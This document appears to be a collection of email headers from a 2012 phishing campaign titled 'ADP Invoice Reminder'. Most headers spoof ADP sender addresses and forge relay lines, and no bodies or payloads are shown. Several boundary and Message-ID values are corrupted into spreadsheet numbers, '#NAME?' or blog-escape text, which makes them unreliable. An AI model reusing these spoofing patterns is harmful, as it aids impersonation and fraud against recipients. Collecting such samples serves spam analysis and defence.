Received: from [167.56.187.184] (helo=qyiwfgtkkoemz.gxdkgpatewqaxcs.ru)
From: "ADPClientServices@adp.com"
Subject: ADP Invoice Reminder
Date: Wed, 19 Sep 2012 00:02:53 +0530
MIME-Version: 1.0
Content-Type: multipart/alternative;
================================================================================================================================
Received: from 23-24-76-113-static.hfc.comcastbusiness.net ([23.24.76.113]) by xxxxxxxxxxxx
Received: from [196.198.28.168] (account ADP_Online_Invoice_DoNotReply@adp.com HELO xmzbgbivrxihmor.dkspjhib.net)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 09:48:51 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: qkhoovc_04
Message-ID: <5730492396 data-blogger-escaped-.7m8dlohc908847=".7m8dlohc908847" data-blogger-escaped-hcbjvufn.siodbeequpkdj.su="hcbjvufn.siodbeequpkdj.su">
================================================================================================================================
Received: from 23-24-76-113-static.hfc.comcastbusiness.net ([23.24.76.113]) by xxxxxxxxxxxx
Received: from [196.198.28.168] (account ADP_Online_Invoice_DoNotReply@adp.com HELO xmzbgbivrxihmor.dkspjhib.net)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 09:48:51 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: qkhoovc_04
Message-ID: <5730492396 data-blogger-escaped-.7m8dlohc908847=".7m8dlohc908847" data-blogger-escaped-hcbjvufn.siodbeequpkdj.su="hcbjvufn.siodbeequpkdj.su">
================================================================================================================================
Received: from [92.46.248.197] ([92.46.248.197]) by xxxxxxxxxxxxxxxxxxxxxxx
Received: from [82.109.28.88] (account ADP_Online_Invoice_DoNotReply@adp.com HELO plnjsqulteumcvk.intistwz.ua)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 19:39:35 +0500
Message-ID: <9606641265 data-blogger-escaped-.x12kr404333=".x12kr404333" data-blogger-escaped-rpnswsgpwwkii.ftsxtvkye.ua="rpnswsgpwwkii.ftsxtvkye.ua">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: feait-32
Content-Language: en
================================================================================================================================
Received: from PowerBox ([189.27.131.211]) by xxxxxxxxxxxx
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 11:43:12 -0300
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
3.0609E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="windows-1250"
================================================================================================================================
Received: from 173-166-62-118-newengland.hfc.comcastbusiness.net ([173.166.62.118]) by xxxxxxxxxxxxxxxxxxwith SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 09:38:30 -0500
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
1.0302E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="us-ascii"
================================================================================================================================
Received: from ool-4b7fd7d2.static.optonline.net ([75.127.215.210]) by xxxxxxxxxx218.xxxxxxxxxx148.14]) with SMTP;
Received: from (192.168.1.63) by adp.com (75.127.215.210) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 09:35:03 -0500
Message-ID: <5051e2b2 data-blogger-escaped-.508080=".508080" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 09:35:03 -0500
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20101112 Thunderbird/3.1.4
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------01070100404080205010201"
This is a multi-part message in MIME format.
1.0701E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from [94.202.66.92] ([94.202.66.92]) by xxxxxxxxxxxxx
Received: from [147.179.98.137] (account ADP_Online_Invoice_DoNotReply@adp.com HELO lbbamteov.zzyinxxidzrq.com)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 18:33:37 +0400
Message-ID: <2681072594 data-blogger-escaped-.ibozq715204=".ibozq715204" data-blogger-escaped-veldalsurn.bxxjxtvbgyz.biz="veldalsurn.bxxjxtvbgyz.biz">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: xifywauon_33
Content-Language: en
------=_dpohbb_97_28_15
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from 070-155-244-208.sip.mia.bellsouth.net ([70.155.244.208]) by xxxxxxxxxxxxxx
Received: from [202.43.192.113] (account ADP_Online_Invoice_DoNotReply@adp.com HELO oknjush.jqywial.biz)
Date:
From:
X-Mailer: The Bat! (v2.00.18) Business
X-Priority: 3 (Normal)
Message-ID: <4180193091 data-blogger-escaped-.rqxrix3f483549=".rqxrix3f483549" data-blogger-escaped-splahpptmw.ekaqetbilciimux.net="splahpptmw.ekaqetbilciimux.net">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------514975CB08A4B6"
------------514975CB08A4B6
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from [50.20.84.34] ([50.20.84.34]) xxxxxxxxxxxxxxx
Received: from apache by adp.com with local (Exim 4.67)
Subject: ADP Invoice Reminder
X-PHP-Script: adp.com/sendmail.php for 50.20.84.34
From: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Sender: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Mailer: PHP
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
Message-Id: <7k97er data-blogger-escaped--2ozij1-oo="-2ozij1-oo" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 09:27:28 -0500
This is a multi-part message in MIME format.
9.0504E+21
Content-Type: text/plain; charset="us-ascii"; format=flowed
================================================================================================================================
------------=_1348015405-19759-15
Content-Type: message/rfc822
Content-Disposition: inline
Content-Transfer-Encoding: binary
Received: from h173.120.21.98.static.ip.windstream.net ([98.21.120.173]) xxxxxxxxx
Received: from [193.192.168.185] (account ADP_Online_Invoice_DoNotReply@adp.com HELO agbllldbnbvqxfq.kwekxwunruavuq.org)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 09:24:43 -0500
Message-ID: <9945353135 data-blogger-escaped-.n34kt359651=".n34kt359651" data-blogger-escaped-xulhnn.aqbmuiwpaml.va="xulhnn.aqbmuiwpaml.va">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: zckimbfsi 31
Content-Language: en
------=_iubkqawcfu_82_91_90
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [24.139.251.184] ([24.139.251.184]) xxxxxxxxxxxxxxxxx
Received: from [39.37.52.55] (account ADP_Online_Invoice_DoNotReply@adp.com HELO lccxzxjzqhwhtyd.xtxdcuiowmmqzf.com)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 10:24:09 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: unrhtqp 61
Message-ID: <3804914771 data-blogger-escaped-.rpvcdesl360645=".rpvcdesl360645" data-blogger-escaped-ustrgqo.bqcotvovdgn.va="ustrgqo.bqcotvovdgn.va">
------=_addfge_56_00_60
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [69.1.166.203] ([69.1.166.203]) by xxxxxxxxxx193.xxxxxxxxxx148.10]) with SMTP;
Received: from [191.107.29.87] (account ADP_Online_Invoice_DoNotReply@adp.com HELO acugjd.jbwkjvv.biz)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 08:23:27 -0600
Message-ID: <3352505874 data-blogger-escaped-.gjsi7735271=".gjsi7735271" data-blogger-escaped-uxotixegwronu.mecilsfyumhmcd.su="uxotixegwronu.mecilsfyumhmcd.su">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: cpljdp 25
Content-Language: en
------=_zfejdxzc_63_04_85
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from 66-191-80-206.static.stpt.wi.charter.com ([66.191.80.206]) by xxxxxxxxxx191.xxxxxxxxxx148.14]) with SMTP;
Received: from [195.177.56.41] (helo=sdskigthgawwjzy.rzspg.com)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 08:23:21 -0600
Message-ID: <0448970980 data-blogger-escaped-.8u3oi698875=".8u3oi698875" data-blogger-escaped-qebdrdptnwwc.eegqizbijhn.va="qebdrdptnwwc.eegqizbijhn.va">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: wlbyzidlja 13
Content-Language: en
------=_zkitvmggp_11_95_41
Content-Type: text/plain;
================================================================================================================================
Received: from [197.1.163.242] ([197.1.163.242]) by xxxxxxxxxx216.xxxxxxxxxx148.13]) with SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 15:19:01 +0100
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID: <665d473c2835fa4b155f711ae51564b1 data-blogger-escaped-adp.com="adp.com">
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
4.0707E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="windows-1250"
================================================================================================================================
Received: from [94.129.178.12] ([94.129.178.12]) by xxxxxxxxxx186.xxxxxxxxxx148.14]) with SMTP;
Received: from [200.147.197.89] (helo=jrffi.acazltkn.ua)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 17:24:01 +0300
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: wyxmmpcmw_06
Message-ID: <4790825076 data-blogger-escaped-.iwv8s00u835579=".iwv8s00u835579" data-blogger-escaped-zaojruyalmm.inlvllesiakk.com="zaojruyalmm.inlvllesiakk.com">
------=_jtumdemziq_25_26_54
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from wsip-24-234-114-201.lv.lv.cox.net ([24.234.114.201]) by xxxxxxxxxx236.xxxxxxxxxx148.11]) with SMTP;
Received: from [173.79.28.58] (account ADP_Online_Invoice_DoNotReply@adp.com HELO dlcznjzm.jlofsviolxhtqqk.biz)
Date:
From:
X-Mailer: The Bat! (v3.51.10) Professional
X-Priority: 3 (Normal)
Message-ID: <6486138621 data-blogger-escaped-.v8ruhvy7078817=".v8ruhvy7078817" data-blogger-escaped-hajpo.anhdetbxaco.com="hajpo.anhdetbxaco.com">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------1F1A271284963E"
------------1F1A271284963E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from host17432004053.direcway.com ([174.32.53.40]) by xxxxxxxxxx201.xxxxxxxxxx148.14]) with SMTP;
Received: from (192.168.1.183) by adp.com (174.32.53.40) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 08:13:44 -0600
Message-ID: <5051e750 data-blogger-escaped-.602090=".602090" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 08:13:44 -0600
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101103 Thunderbird/3.1.6
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------02070100402010209030406"
This is a multi-part message in MIME format.
2.0701E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from [178.91.24.25] ([178.91.24.25]) by xxxxxxxxxx241.xxxxxxxxxx148.13]) with SMTP;
Received: from apache by adp.com with local (Exim 4.67)
Subject: ADP Invoice Reminder
X-PHP-Script: adp.com/sendmail.php for 178.91.24.25
From: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Sender: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Mailer: PHP
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
Message-Id:
Date: Thu, 13 Sep 2012 20:09:15 +0600
This is a multi-part message in MIME format.
8.0709E+21
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
================================================================================================================================
Received: from rrcs-97-78-55-219.se.biz.rr.com ([97.78.55.219]) by xxxxxxxxxx223.xxxxxxxxxx148.14]) with SMTP;
Received: from [50.182.21.51] (account ADP_Online_Invoice_DoNotReply@adp.com HELO wizrzlujcvbye.bihxivkxuqqrlck.org)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 09:04:37 -0500
Message-ID: <5270606855 data-blogger-escaped-.qsl61967594=".qsl61967594" data-blogger-escaped-zzoplyw.aycvlhrkyo.ru="zzoplyw.aycvlhrkyo.ru">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: qlywgmzna.54
Content-Language: en
------=_dngv_71_64_28
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from 187-79-152-18.user.veloxzone.com.br ([187.79.152.18]) byxxxxxxxxxx148.14]) with SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 11:02:40 -0300
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
================================================================================================================================
Received: from [178.91.15.141] ([178.91.15.141]) by xxxxxxxxxx161.xxxxxxxxxx148.11]) with SMTP;
Received: from (192.168.1.41) by adp.com (178.91.15.141) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 20:00:57 +0600
Message-ID: <5051d929 data-blogger-escaped-.407040=".407040" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 20:00:57 +0600
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.24) Gecko/20100328 Thunderbird/2.0.0.24
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------07070600903010508070107"
This is a multi-part message in MIME format.
7.0706E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from bd3d668a.virtua.com.br ([189.61.102.138]) by xxxxxxxxxx190.xxxxxxxxxx148.14]) with SMTP;
Received: from (192.168.1.99) by adp.com (189.61.102.138) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 10:53:35 -0300
Message-ID: <50517edd data-blogger-escaped-.803050=".803050" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 10:53:35 -0300
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20101112 Thunderbird/3.1.4
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------01040400309010705020301"
This is a multi-part message in MIME format.
1.0404E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from ABTS-AP-dynamic-090.182.169.122.airtelbroadband.in ([122.169.182.90]) by xxxxxxxxxx180.xxxxxxxxxx148.11]) with SMTP;
Received: from [148.2.138.85] (account ADP_Online_Invoice_DoNotReply@adp.com HELO sufmidabiu.vfgewdpybjjrjm.ua)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 19:12:00 +0530
Message-ID: <5482274669 data-blogger-escaped-.p5fp0597374=".p5fp0597374" data-blogger-escaped-rkhgwsgoplxww.mzndb.tv="rkhgwsgoplxww.mzndb.tv">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: ztqttspoqo.26
Content-Language: en
------=_goqxpvebp_47_73_18
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from mail.yeagerboyd.com ([199.72.146.106]) by xxxxxxxxxx197.xxxxxxxxxx148.13]) with SMTP;
Received: from (192.168.1.157) by adp.com (199.72.146.106) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 07:37:09 -0600
Message-ID: <5051df6d data-blogger-escaped-.808030=".808030" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 07:37:09 -0600
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) Gecko/20101112 Thunderbird/3.1.4
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------07040500104020905030801"
This is a multi-part message in MIME format.
7.0405E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
7.0405E+21
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from rrcs-67-79-53-66.sw.biz.rr.com ([67.79.53.66]) by xxxxxxxxxx242.xxxxxxxxxx148.10]) with SMTP;
Received: from [137.159.24.177] (helo=sodmayqttqguj.xqzxs.tv)
Date:
From:
X-Mailer: The Bat! (v3.5.25) Professional
X-Priority: 3 (Normal)
Message-ID: <0851818309 data-blogger-escaped-.bq9jfz3m183339=".bq9jfz3m183339" data-blogger-escaped-finwhygommlepr.ijscsgbgf.biz="finwhygommlepr.ijscsgbgf.biz">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------33F1EFAEBAAB889"
------------33F1EFAEBAAB889
Content-Type: text/plain; charset=Windows-1252
Content-Transfer-Encoding: 7bit
================================================================================================================================
Content-Type: message/rfc822
Content-Disposition: inline
Content-Transfer-Encoding: binary
Received: from c-75-73-205-69.hsd1.mn.comcast.net ([75.73.205.69]) by xxxxxxxxxx199.xxxxxxxxxx148.14]) with SMTP;
Received: from (192.168.1.223) by adp.com (75.73.205.69) with Microsoft SMTP Server id 8.0.685.24; Thu, 13 Sep 2012 07:28:14 -0600
Message-ID: <5051d931 data-blogger-escaped-.803020=".803020" data-blogger-escaped-adp.com="adp.com">
Date: Thu, 13 Sep 2012 07:28:14 -0600
From: "ADP_Online_Invoice_DoNotReply@adp.com"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.24) Gecko/20100328 Thunderbird/2.0.0.24
MIME-Version: 1.0
Subject: ADP Invoice Reminder
Content-Type: multipart/alternative;
boundary="------------09020200307030404040901"
This is a multi-part message in MIME format.
9.0202E+21
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from static.cmcti.vn ([203.205.24.229]) by xxxxxxxxxx232.xxxxxxxxxx148.14]) with SMTP;
Received: from [104.12.110.159] (account ADP_Online_Invoice_DoNotReply@adp.com HELO dwfiaohnsxccfpb.oyoemmimpa.ua)
Date:
From:
X-Mailer: The Bat! (v3.81.14 Beta) Home
X-Priority: 3 (Normal)
Message-ID: <6200073131 data-blogger-escaped-.nou4zou6824436=".nou4zou6824436" data-blogger-escaped-omkuhqd.ustzdky.net="omkuhqd.ustzdky.net">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------CD138B87CE9A363"
#NAME?
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from c-174-54-26-57.hsd1.pa.comcast.net ([174.54.26.57]) by xxxxxxxxxx210.xxxxxxxxxx148.13]) with SMTP;
Received: from [196.140.87.23] (helo=gbbfxoarrijcr.ojlwzadlj.org)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 08:21:11 -0500
Message-ID: <4636851932 data-blogger-escaped-.k1xdj570016=".k1xdj570016" data-blogger-escaped-ljijxniqs.yfqghui.com="ljijxniqs.yfqghui.com">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: nluigh_88
Content-Language: en
------=_mrdcr_81_15_31
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from c-174-54-26-57.hsd1.pa.comcast.net ([174.54.26.57]) by xxxxxxxxxx210.xxxxxxxxxx148.13]) with SMTP;
Received: from [197.181.174.54] (helo=cchpjthydmq.urfeubxydz.ru)
Date:
From:
X-Mailer: The Bat! (v2.00.5) Educational
X-Priority: 3 (Normal)
Message-ID: <0621156856 data-blogger-escaped-.pq85ns5j693295=".pq85ns5j693295" data-blogger-escaped-zegojfzqmkogn.cmlwfcqxjo.net="zegojfzqmkogn.cmlwfcqxjo.net">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------D1C1B698DAFC7B4"
#NAME?
Content-Type: text/plain; charset=windows-1250
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from user216-178-83-54.netcarrier.net ([216.178.83.54]) by xxxxxxxxxx242.xxxxxxxxxx148.14]) with SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 08:21:00 -0500
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID: <0dbe7958c363fd71225386920234896e data-blogger-escaped-adp.com="adp.com">
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
5.0106E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="Windows-1252"
================================================================================================================================
X-SenderBase: -1.8
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AitYAAXRUVBgCtuuUmdsb2JhbAAQCC0OgjaCWqU0iEaHWQJ8GAEbU4M1CgEoA1IHGgEaBAWGAIF8C4NvhFKzXosQGoFHgSsOgj1gA4hVmBWHQFiBRYE/
X-IronPort-AV: E=Sophos;i="4.80,417,1344225600";
d="scan'208,217";a="353258294"
Received: from rrcs-96-10-219-174.midsouth.biz.rr.com ([96.10.219.174])
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 07:31:40 -0500
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID: <5e5474088b01108020cb30be4c585b21 data-blogger-escaped-adp.com="adp.com">
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
4.0904E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="Windows-1252"
================================================================================================================================
Received: from [41.73.224.41] ([41.73.224.41]) by xxxxxxxxxx230.xxxxxxxxxx148.10]) with SMTP;
Received: from [134.135.172.152] (helo=tqwctknjywru.wdhfoue.va)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Thu, 13 Sep 2012 13:26:46 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: qocrg 51
Message-ID: <0171683514 data-blogger-escaped-.27hbnt9q450809=".27hbnt9q450809" data-blogger-escaped-dglxnsmfcwbfnhu.bbugoylb.biz="dglxnsmfcwbfnhu.bbugoylb.biz">
------=_vbkayah_83_23_59
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [175.110.106.135] ([175.110.106.135]) by xxxxxxxxxx229.xxxxxxxxxx148.14]) with SMTP;
Received: from [172.28.56.49] (account ADP_Online_Invoice_DoNotReply@adp.com HELO agcdeynjhwlfgzd.qtghcxftrzndo.com)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Wed, 12 Sep 2012 07:42:29 -0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Priority: 3
X-Mailer: uvttp 88
Message-ID: <9647050176 data-blogger-escaped-.pigbejbo049735=".pigbejbo049735" data-blogger-escaped-anfzzovetn.kfftlb.va="anfzzovetn.kfftlb.va">
------=_dveura_43_69_04
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [79.106.14.85] ([79.106.12.67]) by xxxxxxxxxx176.xxxxxxxxxx148.10]) with SMTP;
Received: from [109.83.46.46] (helo=beywddqdklaygnq.wexzbbe.com)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Wed, 12 Sep 2012 16:42:25 +0100
Message-ID: <8499975104 data-blogger-escaped-.2fqw9094998=".2fqw9094998" data-blogger-escaped-czjrsn.ezqtw.org="czjrsn.ezqtw.org">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: jnhrtzn-29
Content-Language: en
------=_rogdop_61_77_16
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from [175.110.106.135] ([175.110.106.135]) by xxxxxxxxxx229.xxxxxxxxxx148.14]) with SMTP;
Received: from [206.110.8.102] (account ADP_Online_Invoice_DoNotReply@adp.com HELO gworqecp.wuzdfju.com)
Date:
From:
X-Mailer: The Bat! (v3.71.01) Home
X-Priority: 3 (Normal)
Message-ID: <4122797397 data-blogger-escaped-.e8u33rb9015237=".e8u33rb9015237" data-blogger-escaped-vclexmzhvwjvkum.dlrye.net="vclexmzhvwjvkum.dlrye.net">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------678AE86DB5F379B"
------------678AE86DB5F379B
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
================================================================================================================================
Received: from [197.0.127.4] ([197.0.127.4]) by xxxxxxxxxx191.xxxxxxxxxx148.14]) with SMTP;
Received: from apache by adp.com with local (Exim 4.67)
Subject: ADP Invoice Reminder
X-PHP-Script: adp.com/sendmail.php for 197.0.127.4
From: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Sender: "ADP_Online_Invoice_DoNotReply@adp.com"
X-Mailer: PHP
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
Message-Id:
Date: Wed, 12 Sep 2012 13:47:25 +0100
This is a multi-part message in MIME format.
6.0803E+21
Content-Type: text/plain; charset="Windows-1252"; format=flowed
================================================================================================================================
Received: from bb116-14-165-7.singnet.com.sg ([116.14.165.7]) by xxxxxxxxxx229.xxxxxxxxxx148.10]) with SMTP;
Received: from [77.66.26.175] (account ADP_Online_Invoice_DoNotReply@adp.com HELO xpkjlpgsdu.shantobufy.biz)
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Subject: ADP Invoice Reminder
Date: Tue, 11 Sep 2012 03:28:27 +0800
Message-ID: <1893259097 data-blogger-escaped-.xo6mm419623=".xo6mm419623" data-blogger-escaped-rwzqsq.vpphvxfvxncv.net="rwzqsq.vpphvxfvxncv.net">
MIME-Version: 1.0
Content-Type: multipart/alternative;
X-Mailer: cqvfxraq 46
Content-Language: en
------=_ryxrfrsyk_93_92_50
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable
================================================================================================================================
Received: from ip-204-12-179-43.sag.speednetllc.com ([204.12.179.43]) by xxxxxxxxxx206.xxxxxxxxxx148.11]) with SMTP;
Received: from apache by adp.com with local (Exim 4.63)
Subject: ADP Invoice Reminder
Date: Mon, 10 Sep 2012 13:13:59 -0500
From: "ADP_Online_Invoice_DoNotReply@adp.com"
Message-ID: <826a17e3ae5174661ec3b07d0d1bcc69 data-blogger-escaped-adp.com="adp.com">
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
This is a multi-part message in MIME format.
6.0304E+21
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="windows-1250"
================================================================================================================================
Received: from [193.138.153.55] ([193.138.153.55]) byxxxxxxxxxx148.13]) with SMTP;
Received: from [11.60.151.151] (helo=yzjmdveblxcmx.nnoxhhzmsuhkm.ua)
Date:
From:
X-Mailer: The Bat! (v3.0.0.15) Home
X-Priority: 3 (Normal)
Message-ID: <6476433821 data-blogger-escaped-.cu6yk8u2177890=".cu6yk8u2177890" data-blogger-escaped-hdxeeli.zirxfga.org="hdxeeli.zirxfga.org">
Subject: ADP Invoice Reminder
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----------33C7A418F1A9DC6F"
------------33C7A418F1A9DC6F
